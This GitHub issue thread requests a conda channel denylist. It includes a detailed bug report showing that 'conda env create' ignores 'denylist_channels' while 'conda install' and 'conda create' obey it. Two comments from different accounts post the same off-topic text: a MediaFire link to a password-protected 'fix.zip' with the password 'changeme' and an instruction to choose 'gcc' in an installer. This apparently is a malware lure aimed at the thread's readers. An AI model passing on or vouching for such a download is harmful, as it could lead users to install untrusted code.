### ISSUE TITLE
Global channel denylist

### ISSUE THREAD

**Issue by Hoeze** [conda/conda#14176]
### Checklist

- [X] I added a descriptive title
- [X] I searched open requests and couldn't find a duplicate

### What is the idea?

Add the possibility to force-disable/denylist some channels

### Why is this needed?

We do not want to use the defaults channel but it randomly gets pulled in by some projects, environment.yaml's, etc.
We cannot watch every user or piece of software to not use the defaults channel.

### What should happen?

Users would see a warning that some channel (e.g. defaults) has been blacklisted and will not be used for dependency resolution.

### Additional Context

Anaconda now sues organizations for using their channels:
https://www.reuters.com/legal/litigation/intel-sued-copyright-infringement-over-ai-software-2024-08-09/

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by troygiorshev** [comment]
> The install still proceeded and appears to have used defaults 😢

I can replicate this, and I agree, this is not the behavior that I would expect.

**`conda env create` does not obey the denylist.**

From a fresh install, first I set:
`conda config --add denylist_channels defaults`

Contents of `.condarc`:
```
channels:
  - conda-forge
denylist_channels:
  - defaults
```
And, I verified through `conda info` and `conda config --show` that there isn't anything strange in my setup.

### Single Package
`conda install numpy -c defaults`

As expected, it gives the following:
```
ChannelDenied: Channel included in denylist:
  channel name: defaults
  channel url: None
```

### New Environment with `conda create`
`conda create --name test-env numpy -c defaults`

As expected, I am again denied.

### New Environment with `conda env create`

Using a `test-env.yml` of:
```
name: test-env
channels:
  - defaults
dependencies:
  - python=3.10
  - numpy
```

When I run:
`conda env create --file test-env.yml`

It completes, and `conda list --show-channel-urls` confirms it used `defaults`.
```
numpy                     2.2.4           py310h210a465_0    defaults
```

**This feels like a bug to me.  Is it?
Or, is `conda env` supposed ignore the system config?** 

My goal is to prevent `conda` from downloading packages from `https://repo.anaconda.com/pkgs/main` , even if I am, say, restoring an environment from an old backup.  

Also, this behavior persists even when I follow the steps suggested in [the docs](https://docs.conda.io/projects/conda/en/stable/user-guide/configuration/settings.html#allowlist-channels-and-denylist-channels-allow-or-deny-specific-channels) and explicitly deny the channels by URL.

```
denylist_channels:
  - https://repo.anaconda.com/pkgs/main
  - https://repo.anaconda.com/pkgs/r
  - https://repo.anaconda.com/pkgs/msys2
```
